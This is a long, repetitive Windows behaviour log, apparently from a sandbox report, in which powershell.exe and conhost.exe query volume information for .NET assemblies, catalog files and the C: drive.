Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
